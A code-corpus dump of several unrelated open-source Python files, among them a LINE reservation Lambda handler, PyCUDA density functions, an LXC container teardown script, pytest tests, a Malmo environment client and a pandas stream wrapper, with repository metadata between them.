'number_of_people': str(body['reservationPeopleNumber']),
'remind_date_difference': remind_date_difference
}
flex_message = flex_message_builder.create_restaurant_remind(**flex_prm)
return flex_message
def get_channel_access_token(channel_id):
"""
短期チャネルアクセストークンをチャネル情報のテーブルから取得する
Parameters
----------
channel_id : str
LINE公式アカウントもしくはMINIアプリのチャネルID
LINE Developersコンソールにて確認可能
Returns
-------
channelAccessToken : str
access_token:短期のチャネルアクセストークン
"""
item = channel_access_token_table_controller.get_item(channel_id)
return item['channelAccessToken']
def put_push_messages_to_dynamo(body, remind_date_difference):
"""
プッシュメッセージのメッセージ情報を作成し、DynamoDBに登録する。
DynamoDBへの登録処理自体は共通処理にて行っている。
Parameters
----------
body : dict
フロントから渡ってきたパラメータ
remind_date_difference : int
当日以前のリマインド行う日付の差分
予約日以降のメッセージ送信を考慮し、マイナス値を許可(ex:3日前→-3)
"""
remind_date_on_day = body['reservationDate']
    # Register the reminder message for the reservation day itself
flex_message_on_day = create_flex_message(body, ON_DAY_REMIND_DATE_DIFFERENCE) # noqa:E501
message_table_controller.put_push_message(
body['userId'], CHANNEL_ID, flex_message_on_day,
remind_date_on_day)
    # Register the reminder message for the specified day
flex_message_day_before = create_flex_message(body, remind_date_difference) # noqa:E501
remind_date_day_before = utils.calculate_date_str_difference(
remind_date_on_day, remind_date_difference)
message_table_controller.put_push_message(
body['userId'], CHANNEL_ID, flex_message_day_before,
remind_date_day_before)
def lambda_handler(event, context):
"""
予約情報のデータ登録とLINEメッセージの送信を行う。
Parameters
----------
event : dict
フロントから送られたパラメータ等の情報
context : __main__.LambdaContext
Lambdaランタイムや関数名等のメタ情報
Returns
-------
response: dict
正常の場合、予約IDを返却する。
エラーの場合、エラーコードとエラーメッセージを返却する。
"""
    # Log the incoming parameters
logger.info(event)
if event['body'] is None:
error_msg_disp = common_const.const.MSG_ERROR_NOPARAM
return utils.create_error_response(error_msg_disp, 400)
body = json.loads(event['body'])
    # Get the user ID
try:
user_profile = line.get_profile(
body['idToken'], LIFF_CHANNEL_ID)
if 'error' in user_profile and 'expired' in user_profile['error_description']: # noqa 501
return utils.create_error_response('Forbidden', 403)
else:
body['userId'] = user_profile['sub']
except Exception:
        logger.exception('An invalid ID token was used')
return utils.create_error_response('Error')
    # Parameter check
param_checker = RestaurantParamCheck(body)
if error_msg := param_checker.check_api_reservation_put():
error_msg_disp = ('\n').join(error_msg)
logger.error(error_msg_disp)
return utils.create_error_response(error_msg_disp, 400)
try:
        # Register the reservation data
shop_info = shop_master_table_controller.get_item(body['shopId'])
put_shop_reservation_info(body, shop_info)
reservation_id = put_customer_reservation_info(body, shop_info)
        # Save the push messages to DynamoDB
put_push_messages_to_dynamo(body, REMIND_DATE_DIFFERENCE)
except Exception as e:
logger.error('Occur Exception: %s', e)
return utils.create_error_response('ERROR')
return utils.create_success_response(
json.dumps({'reservationId': reservation_id}))
| 32.52381 | 99 | 0.66194 | 1,270 | 12,977 | 6.377165 | 0.227559 | 0.021114 | 0.032103 | 0.013582 | 0.263736 | 0.206816 | 0.123719 | 0.072602 | 0.061242 | 0.038523 | 0 | 0.004809 | 0.246898 | 12,977 | 398 | 100 | 32.605528 | 0.8238 | 0.182862 | 0 | 0.066327 | 0 | 0 | 0.140527 | 0.020754 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045918 | false | 0 | 0.061224 | 0 | 0.173469 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5cc5c90cc24e579e7e39dd76fdb62ea4b310c1d | 8,710 | py | Python | gpustats/pdfs.py | dukestats/gpustats | 570fdeb4d1da204b1e56717ba29db07a08be8629 | [
"BSD-3-Clause"
] | 23 | 2015-02-01T23:46:52.000Z | 2021-01-13T18:07:47.000Z | gpustats/pdfs.py | dukestats/gpustats | 570fdeb4d1da204b1e56717ba29db07a08be8629 | [
"BSD-3-Clause"
] | null | null | null | gpustats/pdfs.py | dukestats/gpustats | 570fdeb4d1da204b1e56717ba29db07a08be8629 | [
"BSD-3-Clause"
] | 6 | 2015-06-18T10:23:59.000Z | 2020-05-05T22:32:40.000Z | from numpy.random import randn
from numpy.linalg import cholesky as chol
import numpy as np
import numpy.linalg as LA
from pycuda.gpuarray import GPUArray, to_gpu
from pycuda.gpuarray import empty as gpu_empty
import gpustats.kernels as kernels
import gpustats.codegen as codegen
from gpustats.util import transpose as gpu_transpose
from importlib import reload  # reload was a builtin on Python 2; the import is needed on Python 3
reload(codegen)
reload(kernels)
import gpustats.util as util
import pycuda.driver as drv
__all__ = ['mvnpdf', 'mvnpdf_multi', 'normpdf', 'normpdf_multi']
cu_module = codegen.get_full_cuda_module()
#-------------------------------------------------------------------------------
# Invokers for univariate and multivariate density functions conforming to the
# standard API
def _multivariate_pdf_call(cu_func, data, packed_params, get, order,
datadim=None):
packed_params = util.prep_ndarray(packed_params)
func_regs = cu_func.num_regs
# Prep the data. Skip if gpudata ...
if isinstance(data, GPUArray):
padded_data = data
        if datadim is None:
ndata, dim = data.shape
else:
ndata, dim = data.shape[0], datadim
else:
ndata, dim = data.shape
padded_data = util.pad_data(data)
nparams = len(packed_params)
data_per, params_per = util.tune_blocksize(padded_data,
packed_params,
func_regs)
blocksize = data_per * params_per
#print 'the blocksize is ' + str(blocksize)
#print 'data_per ' + str(data_per) + '. params_per ' + str(params_per)
shared_mem = util.compute_shmem(padded_data, packed_params,
data_per, params_per)
block_design = (data_per * params_per, 1, 1)
grid_design = (util.get_boxes(ndata, data_per),
util.get_boxes(nparams, params_per))
# see cufiles/mvcaller.cu
design = np.array(((data_per, params_per) + # block design
padded_data.shape + # data spec
(dim,) + # non-padded number of data columns
packed_params.shape), # params spec
dtype=np.int32)
if nparams == 1:
gpu_dest = gpu_empty(ndata, dtype=np.float32)
#gpu_dest = to_gpu(np.zeros(ndata, dtype=np.float32))
else:
gpu_dest = gpu_empty((ndata, nparams), dtype=np.float32, order='F')
#gpu_dest = to_gpu(np.zeros((ndata, nparams), dtype=np.float32, order='F'))
# Upload data if not already uploaded
if not isinstance(padded_data, GPUArray):
gpu_padded_data = to_gpu(padded_data)
else:
gpu_padded_data = padded_data
gpu_packed_params = to_gpu(packed_params)
params = (gpu_dest, gpu_padded_data, gpu_packed_params) + tuple(design)
kwds = dict(block=block_design, grid=grid_design, shared=shared_mem)
cu_func(*params, **kwds)
gpu_packed_params.gpudata.free()
if get:
        if order == 'F':
return gpu_dest.get()
else:
return np.asarray(gpu_dest.get(), dtype=np.float32, order='C')
#output = gpu_dest.get()
#if nparams > 1:
# output = output.reshape((nparams, ndata), order='C').T
#return output
else:
        if order == 'F' or nparams == 1:
return gpu_dest
else:
res = gpu_transpose(util.GPUarray_reshape(gpu_dest, (nparams, ndata), "C"))
gpu_dest.gpudata.free()
return res
#return gpu_transpose(gpu_dest.reshape(nparams, ndata, 'C'))
def _univariate_pdf_call(cu_func, data, packed_params, get):
ndata = len(data)
nparams = len(packed_params)
func_regs = cu_func.num_regs
packed_params = util.prep_ndarray(packed_params)
data_per, params_per = util.tune_blocksize(data,
packed_params,
func_regs)
shared_mem = util.compute_shmem(data, packed_params,
data_per, params_per)
block_design = (data_per * params_per, 1, 1)
grid_design = (util.get_boxes(ndata, data_per),
util.get_boxes(nparams, params_per))
# see cufiles/univcaller.cu
#gpu_dest = to_gpu(np.zeros((ndata, nparams), dtype=np.float32))
gpu_dest = gpu_empty((ndata, nparams), dtype=np.float32)
gpu_data = data if isinstance(data, GPUArray) else to_gpu(data)
gpu_packed_params = to_gpu(packed_params)
design = np.array(((data_per, params_per) + # block design
(len(data),) +
packed_params.shape), # params spec
dtype=np.int32)
cu_func(gpu_dest,
gpu_data, gpu_packed_params, design[0],
design[1], design[2], design[3], design[4],
block=block_design, grid=grid_design, shared=shared_mem)
if get:
output = gpu_dest.get()
if nparams > 1:
output = output.reshape((nparams, ndata), order='C').T
return output
else:
return gpu_dest
#-------------------------------------------------------------------------------
# Multivariate normal
def mvnpdf(data, mean, cov, weight=None, logged=True, get=True, order="F",
datadim=None):
"""
Multivariate normal density
Parameters
----------
Returns
-------
"""
return mvnpdf_multi(data, [mean], [cov],
logged=logged, get=get, order=order,
datadim=datadim).squeeze()
def mvnpdf_multi(data, means, covs, weights=None, logged=True,
get=True, order="F", datadim=None):
"""
Multivariate normal density with multiple sets of parameters
Parameters
----------
data : ndarray (n x k)
covs : sequence of 2d k x k matrices (length j)
weights : ndarray (length j)
Multiplier for component j, usually will sum to 1
get = False leaves the result on the GPU
without copying back.
If data has already been padded, the orginal dimension
must be passed in datadim
It data is of GPUarray type, the data is assumed to be
padded, and datadim will need to be passed if padding
was needed.
Returns
-------
densities : n x j
"""
if logged:
cu_func = cu_module.get_function('log_pdf_mvnormal')
else:
cu_func = cu_module.get_function('pdf_mvnormal')
assert(len(covs) == len(means))
ichol_sigmas = [LA.inv(chol(c)) for c in covs]
logdets = [-2.0*np.log(c.diagonal()).sum() for c in ichol_sigmas]
if weights is None:
weights = np.ones(len(means))
packed_params = _pack_mvnpdf_params(means, ichol_sigmas, logdets, weights)
return _multivariate_pdf_call(cu_func, data, packed_params,
get, order,datadim)
def _pack_mvnpdf_params(means, ichol_sigmas, logdets, weights):
to_pack = []
for m, ch, ld, w in zip(means, ichol_sigmas, logdets, weights):
to_pack.append(_pack_mvnpdf_params_single(m, ch, ld, w))
return np.vstack(to_pack)
def _pack_mvnpdf_params_single(mean, ichol_sigma, logdet, weight=1):
PAD_MULTIPLE = 16
k = len(mean)
mean_len = k
    ichol_len = k * (k + 1) // 2  # integer division: number of lower-triangle entries
mch_len = mean_len + ichol_len
packed_dim = util.next_multiple(mch_len + 2, PAD_MULTIPLE)
packed_params = np.empty(packed_dim, dtype=np.float32)
packed_params[:mean_len] = mean
packed_params[mean_len:mch_len] = ichol_sigma[np.tril_indices(k)]
packed_params[mch_len:mch_len + 2] = weight, logdet
return packed_params
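# Packed layout sketch (assumed k = 2 for illustration):
# [mean_0, mean_1, ichol_00, ichol_10, ichol_11, weight, logdet, <pad to a multiple of 16>]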
#-------------------------------------------------------------------------------
# Univariate normal
def normpdf(x, mean, std, logged=True, get=True):
"""
Normal (Gaussian) density
Parameters
----------
Returns
-------
"""
return normpdf_multi(x, [mean], [std], logged=logged, get=get).squeeze()
def normpdf_multi(x, means, std, logged=True, get=True):
if logged:
cu_func = cu_module.get_function('log_pdf_normal')
else:
cu_func = cu_module.get_function('pdf_normal')
packed_params = np.c_[means, std]
if not isinstance(x, GPUArray):
x = util.prep_ndarray(x)
return _univariate_pdf_call(cu_func, x, packed_params, get)
if __name__ == '__main__':
import gpustats.compat as compat
    n = int(1e5)  # randn requires integer dimensions
k = 8
np.random.seed(1)
data = randn(n, k).astype(np.float32)
mean = randn(k).astype(np.float32)
cov = util.random_cov(k).astype(np.float32)
result = mvnpdf_multi(data, [mean, mean], [cov, cov])
# pyresult = compat.python_mvnpdf(data, [mean], [cov]).squeeze()
# print result - pyresult
| 31.904762 | 87 | 0.604363 | 1,118 | 8,710 | 4.489267 | 0.186941 | 0.071727 | 0.025902 | 0.031879 | 0.407252 | 0.341303 | 0.340705 | 0.314405 | 0.233911 | 0.16577 | 0 | 0.008586 | 0.264524 | 8,710 | 272 | 88 | 32.022059 | 0.774899 | 0.207807 | 0 | 0.296774 | 0 | 0 | 0.01575 | 0 | 0 | 0 | 0 | 0 | 0.006452 | 1 | 0.051613 | false | 0 | 0.077419 | 0 | 0.206452 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5cd7df99f005e209b5f37b4b931f77cc897a454 | 2,950 | py | Python | scripts/python/teardown_deployer_container.py | rbrud/power-up | c0d59a79ad9c713d94da73395a5fd768fcfff838 | [
"Apache-2.0"
] | null | null | null | scripts/python/teardown_deployer_container.py | rbrud/power-up | c0d59a79ad9c713d94da73395a5fd768fcfff838 | [
"Apache-2.0"
] | null | null | null | scripts/python/teardown_deployer_container.py | rbrud/power-up | c0d59a79ad9c713d94da73395a5fd768fcfff838 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2018 IBM Corp.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import nested_scopes, generators, division, absolute_import, \
with_statement, print_function, unicode_literals
import argparse
import os.path
import sys
from subprocess import Popen, PIPE
from lib.config import Config
from lib.exception import UserException
from lib.genesis import DEFAULT_CONTAINER_NAME, GEN_PATH
import lib.logger as logger
def _sub_proc_exec(cmd):
    data = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
    stdout, stderr = data.communicate()
    # Decode the byte output so callers can use string operations on Python 3
    return stdout.decode(), stderr.decode()
def teardown_deployer_container(config_path):
"""Teardown the Cluster Genesis container on the deployer.
This function is idempotent.
"""
log = logger.getlogger()
try:
cfg = Config(config_path)
except UserException:
log.error('Unable to open Cluster Genesis config.yml file')
sys.exit(1)
for vlan in cfg.yield_depl_netw_client_vlan('pxe'):
break
name = '{}-pxe{}'.format(DEFAULT_CONTAINER_NAME, vlan)
container_list, stderr = _sub_proc_exec('lxc-ls')
log.info('Found containers: {}'.format(container_list))
if name not in container_list:
log.info('container name: {} does not exist.'.format(name))
else:
log.info('Destroying container: {}'.format(name))
result, stderr = _sub_proc_exec('lxc-stop -n {}'.format(name))
result, stderr = _sub_proc_exec('lxc-destroy -s -n {}'.format(name))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('config_path', default='config.yml',
help='Config file path. Absolute path or relative '
'to power-up/')
parser.add_argument('--print', '-p', dest='log_lvl_print',
help='print log level', default='info')
parser.add_argument('--file', '-f', dest='log_lvl_file',
help='file log level', default='info')
args = parser.parse_args()
if not os.path.isfile(args.config_path):
args.config_path = GEN_PATH + args.config_path
print('Using config path: {}'.format(args.config_path))
if not os.path.isfile(args.config_path):
sys.exit('{} does not exist'.format(args.config_path))
logger.create(args.log_lvl_print, args.log_lvl_file)
teardown_deployer_container(args.config_path)
| 34.705882 | 78 | 0.689831 | 401 | 2,950 | 4.905237 | 0.418953 | 0.055923 | 0.049822 | 0.025928 | 0.078292 | 0.068124 | 0.068124 | 0.068124 | 0 | 0 | 0 | 0.00382 | 0.201356 | 2,950 | 84 | 79 | 35.119048 | 0.83107 | 0.228136 | 0 | 0.040816 | 0 | 0 | 0.168224 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040816 | false | 0 | 0.183673 | 0 | 0.244898 | 0.102041 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5cf62bcfc6f390b8547295d8aba6cd8cecf7a30 | 1,808 | py | Python | robosat/tools/weights.py | jjmata/robosat | 6b38bcf5cbf13bf79c06624d30600df12cfdd486 | [
"MIT"
] | 2 | 2018-08-05T04:35:41.000Z | 2019-01-15T02:41:37.000Z | robosat/tools/weights.py | jjmata/robosat | 6b38bcf5cbf13bf79c06624d30600df12cfdd486 | [
"MIT"
] | null | null | null | robosat/tools/weights.py | jjmata/robosat | 6b38bcf5cbf13bf79c06624d30600df12cfdd486 | [
"MIT"
] | 1 | 2021-02-22T20:58:34.000Z | 2021-02-22T20:58:34.000Z | import os
import argparse
import numpy as np
from tqdm import tqdm
import torch
from torch.utils.data import DataLoader
from torchvision.transforms import Compose
from robosat.config import load_config
from robosat.datasets import SlippyMapTiles
from robosat.transforms import ConvertImageMode, MaskToTensor
def add_parser(subparser):
parser = subparser.add_parser(
"weights", help="computes class weights on dataset", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument("--dataset", type=str, required=True, help="path to dataset configuration file")
parser.set_defaults(func=main)
def main(args):
dataset = load_config(args.dataset)
path = dataset["common"]["dataset"]
num_classes = len(dataset["common"]["classes"])
train_transform = Compose([ConvertImageMode(mode="P"), MaskToTensor()])
train_dataset = SlippyMapTiles(os.path.join(path, "training", "labels"), transform=train_transform)
n = 0
counts = np.zeros(num_classes, dtype=np.int64)
loader = DataLoader(train_dataset, batch_size=1)
for images, tile in tqdm(loader, desc="Loading", unit="image", ascii=True):
image = torch.squeeze(images)
image = np.array(image, dtype=np.uint8)
n += image.shape[0] * image.shape[1]
counts += np.bincount(image.ravel(), minlength=num_classes)
# Class weighting scheme `w = 1 / ln(c + p)` see:
# - https://arxiv.org/abs/1707.03718
# LinkNet: Exploiting Encoder Representations for Efficient Semantic Segmentation
# - https://arxiv.org/abs/1606.02147
# ENet: A Deep Neural Network Architecture for Real-Time Semantic Segmentation
probs = counts / n
weights = 1 / np.log(1.02 + probs)
weights.round(6, out=weights)
print(weights.tolist())
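# Worked sketch (assumed class frequencies, for illustration): with
# probs = [0.9, 0.1], weights = 1 / log(1.02 + probs) ~= [1.53, 8.82],
# so rare classes receive proportionally larger weights.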
| 31.172414 | 115 | 0.709624 | 230 | 1,808 | 5.513043 | 0.530435 | 0.026025 | 0.020505 | 0.025237 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020833 | 0.176991 | 1,808 | 57 | 116 | 31.719298 | 0.831317 | 0.155973 | 0 | 0 | 0 | 0 | 0.089474 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.294118 | 0 | 0.352941 | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5cfe67a66b476f28011597c8c7dca4079459b75 | 1,807 | py | Python | tests/writers/test_csv_writer.py | cnHeider/draugr | b95e0bb1fa5efa581bfb28ff604f296ed2e6b7d6 | [
"Apache-2.0"
] | 3 | 2019-09-27T08:04:59.000Z | 2020-12-02T06:14:45.000Z | tests/writers/test_csv_writer.py | cnHeider/draugr | b95e0bb1fa5efa581bfb28ff604f296ed2e6b7d6 | [
"Apache-2.0"
] | 64 | 2019-09-27T08:03:42.000Z | 2022-03-28T15:07:30.000Z | tests/writers/test_csv_writer.py | cnHeider/draugr | b95e0bb1fa5efa581bfb28ff604f296ed2e6b7d6 | [
"Apache-2.0"
] | 1 | 2020-10-01T00:18:57.000Z | 2020-10-01T00:18:57.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import pytest
from draugr import PROJECT_APP_PATH
from draugr.writers import CSVWriter
__author__ = "Christian Heider Nielsen"
__doc__ = r"""
"""
@pytest.mark.parametrize(
["tag", "val", "step"],
(("signal", 0, 0), ("signal", 20, 1), ("signal", -1, 6)),
ids=["signal_first", "signal_second", "signal_sixth"],
)
def test_valid_scalars(tag, val, step):
with CSVWriter(path=PROJECT_APP_PATH.user_log / "csv_writer") as w:
w.scalar(tag, val, step)
@pytest.mark.parametrize(
["tag", "val", "step"],
(("signal", "", 0), ("signal", None, 1), ("signal", object(), 6)),
ids=["str_scalar", "None_scalar", "object_scalar"],
)
def test_invalid_val_type_scalars(tag, val, step):
    # The original try/except always passed, because its failing `assert False`
    # was itself swallowed by `except Exception`; pytest.raises is the idiomatic fix.
    with pytest.raises(Exception):
        with CSVWriter(path=PROJECT_APP_PATH.user_log / "csv_writer") as w:
            w.scalar(tag, val, step)
@pytest.mark.parametrize(
["tag", "val", "step"],
((1, 0, 0), (None, 20, 1), (object(), -1, 6)),
ids=["numeral_tag", "None_tag", "object_tag"],
)
def test_invalid_tag_scalars(tag, val, step):
    with pytest.raises(Exception):
        with CSVWriter(path=PROJECT_APP_PATH.user_log / "csv_writer") as w:
            w.scalar(tag, val, step)
@pytest.mark.parametrize(
["tag", "val", "step"],
(("signal", 0, ""), ("signal", 20, None), ("tag1", -0, object())),
ids=["str_step", "None_step", "object_step"],
)
def test_invalid_step_type_scalars(tag, val, step):
    with pytest.raises(Exception):
        with CSVWriter(path=PROJECT_APP_PATH.user_log / "csv_writer") as w:
            w.scalar(tag, val, step)
| 27.8 | 75 | 0.600443 | 244 | 1,807 | 4.237705 | 0.258197 | 0.069633 | 0.116054 | 0.092843 | 0.601547 | 0.601547 | 0.601547 | 0.601547 | 0.564797 | 0.440039 | 0 | 0.017819 | 0.223575 | 1,807 | 64 | 76 | 28.234375 | 0.719173 | 0.023796 | 0 | 0.576923 | 0 | 0 | 0.167991 | 0 | 0 | 0 | 0 | 0 | 0.115385 | 1 | 0.076923 | false | 0 | 0.057692 | 0 | 0.134615 | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5d3ce795825a573ecfd97ed106d9047f0b7c331 | 2,242 | py | Python | MalmoEnv/proxyenv/malmo_proxyenv_client.py | andredornas/malmo | 26433ad2e60035726232ab54a3dac044dea9724f | [
"MIT"
] | 3,570 | 2016-07-08T04:04:25.000Z | 2019-05-05T12:05:38.000Z | MalmoEnv/proxyenv/malmo_proxyenv_client.py | NickKok/malmo | 26433ad2e60035726232ab54a3dac044dea9724f | [
"MIT"
] | 592 | 2016-07-08T10:33:40.000Z | 2019-05-03T15:08:15.000Z | MalmoEnv/proxyenv/malmo_proxyenv_client.py | NickKok/malmo | 26433ad2e60035726232ab54a3dac044dea9724f | [
"MIT"
] | 607 | 2016-07-08T01:01:52.000Z | 2019-05-05T22:06:40.000Z | # ------------------------------------------------------------------------------------------------
# Copyright (c) 2019 Microsoft Corporation
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ------------------------------------------------------------------------------------------------
import gym
import numpy as np
import proxyenv.client
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
arg_parser = ArgumentParser(description='example malmo env runner',
formatter_class=ArgumentDefaultsHelpFormatter)
arg_parser.add_argument('--host', type=str, default='localhost', help='Optional host to connect to.')
arg_parser.add_argument('--port', type=int, default=50050, help='Optional port to connect to.')
args = arg_parser.parse_args()
config = {"mission_file": "MalmoPlatform9000/MalmoEnv/missions/findthegoal.xml"}
env = proxyenv.client.ProxyEnv(args.host, args.port, config)
env.reset()
done = False
while not done:
action = env.action_space.sample()
print("action " + repr(action))
obs, reward, done, info = env.step(action)
print("obs " + repr(obs))
print("reward " + repr(reward))
print("done " + repr(done))
print("info " + repr(info))
env.close()
| 43.960784 | 101 | 0.684211 | 286 | 2,242 | 5.328671 | 0.520979 | 0.057743 | 0.01706 | 0.026247 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006831 | 0.151204 | 2,242 | 50 | 102 | 44.84 | 0.794009 | 0.559768 | 0 | 0 | 0 | 0 | 0.198347 | 0.052686 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.181818 | 0.227273 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5d6e141d164bfaecd369a0ec83a3d87322f3c80 | 6,263 | py | Python | streams/wrappers/pandas_stream.py | kefir/snakee | a17734d4b2d7dfd3e6c7b195baa128fbc84d197b | [
"MIT"
] | null | null | null | streams/wrappers/pandas_stream.py | kefir/snakee | a17734d4b2d7dfd3e6c7b195baa128fbc84d197b | [
"MIT"
] | null | null | null | streams/wrappers/pandas_stream.py | kefir/snakee | a17734d4b2d7dfd3e6c7b195baa128fbc84d197b | [
"MIT"
] | 2 | 2021-04-10T19:22:15.000Z | 2022-03-08T19:37:56.000Z | from typing import Optional, Iterable, Union
try: # Assume we're a sub-module in a package.
from utils import arguments as arg
from utils.external import pd, DataFrame
from interfaces import StreamInterface, ColumnarInterface, Field
from streams import stream_classes as sm
except ImportError: # Apparently no higher-level package has been imported, fall back to a local import.
from ...utils import arguments as arg
from ...utils.external import pd, DataFrame
from ...interfaces import StreamInterface, ColumnarInterface, Field
from .. import stream_classes as sm
Native = Union[StreamInterface, ColumnarInterface]
class PandasStream(sm.WrapperStream, sm.ColumnarMixin, sm.ConvertMixin):
def __init__(
self,
data,
name=arg.AUTO,
source=None,
context=None,
):
assert pd, 'Pandas must be installed and imported for instantiate PandasStream (got fallback {})'.format(pd)
if isinstance(data, DataFrame) or data.__class__.__name__ == 'DataFrame':
dataframe = data
elif hasattr(data, 'get_dataframe'): # isinstance(data, RecordStream):
dataframe = data.get_dataframe()
else: # isinstance(data, (list, tuple)):
dataframe = DataFrame(data=data)
super().__init__(
dataframe,
name=name,
source=source,
context=context,
)
def get_data(self) -> DataFrame:
return super().get_data()
@staticmethod
def get_item_type():
return pd.Series
@classmethod
def _is_valid_item(cls, item) -> bool:
return isinstance(item, pd.Series)
def is_in_memory(self) -> bool:
return True
def get_dataframe(self, columns=None) -> DataFrame:
data = self.get_data()
assert isinstance(data, DataFrame)
if columns:
data = data[columns]
return data
def get_count(self, final: bool = False) -> Optional[int]:
data = self.get_data()
assert isinstance(data, DataFrame)
return data.shape[0]
def get_items(self) -> Iterable:
yield from self.get_dataframe().iterrows()
def get_records(self, columns=arg.AUTO) -> Iterable:
stream = self.select(*columns) if arg.is_defined(columns) else self
return stream._get_mapped_items(lambda i: i[1].to_dict())
def get_rows(self, columns=arg.AUTO):
stream = self.select(*columns) if arg.is_defined(columns) else self
return stream._get_mapped_items(lambda i: i[1].to_list())
def get_columns(self) -> Iterable:
return self.get_dataframe().columns
def get_expected_count(self) -> int:
return self.get_dataframe().shape[0]
def take(self, count: Union[int, bool] = 1) -> Native:
if isinstance(count, bool):
if count:
return self
else:
return self.stream(DataFrame())
elif isinstance(count, int):
return self.stream(
self.get_dataframe().head(count),
)
else:
raise TypeError('Expected count as int or bool, got {}'.format(count))
def get_one_column_values(self, column: Field) -> Iterable:
column_name = arg.get_name(column)
return self.get_dataframe()[column_name]
def add_dataframe(self, dataframe: DataFrame, before=False) -> Native:
if before:
frames = [dataframe, self.get_dataframe()]
else:
frames = [self.get_dataframe(), dataframe]
concatenated = pd.concat(frames)
return self.stream(concatenated)
def add_items(self, items: Iterable, before: bool = False) -> Native:
dataframe = DataFrame(items)
return self.add_dataframe(dataframe, before)
def add_stream(self, stream: StreamInterface, before: bool = False) -> Native:
if isinstance(stream, PandasStream):
return self.add_dataframe(stream.get_data(), before=before)
else:
return self.add_items(stream.get_items(), before=before)
def add(self, dataframe_or_stream_or_items, before: bool = False, **kwargs) -> Native:
assert not kwargs, 'kwargs for PandasStream.add() not supported'
if isinstance(dataframe_or_stream_or_items, DataFrame):
return self.add_dataframe(dataframe_or_stream_or_items, before)
elif isinstance(dataframe_or_stream_or_items, StreamInterface) or sm.is_stream(dataframe_or_stream_or_items):
return self.add_stream(dataframe_or_stream_or_items, before)
elif isinstance(dataframe_or_stream_or_items, Iterable):
return self.add_items(dataframe_or_stream_or_items)
else:
msg = 'dataframe_or_stream_or_items must be DataFrame, Stream or Iterable, got {}'
raise TypeError(msg.format(dataframe_or_stream_or_items))
def select(self, *fields, **expressions) -> Native:
assert not expressions, 'custom expressions are not implemented yet'
dataframe = self.get_dataframe(columns=fields)
return self.stream(dataframe)
    def filter(self, *filters, **expressions) -> Native:
        assert not filters, 'custom filters are not implemented yet'
        pandas_filter = None
        for k, v in expressions.items():
            one_filter = self.get_one_column_values(k) == v
            # `if pandas_filter:` on a boolean Series raises an "ambiguous
            # truth value" error, so compare against None instead
            if pandas_filter is None:
                pandas_filter = one_filter
            else:
                pandas_filter = pandas_filter & one_filter
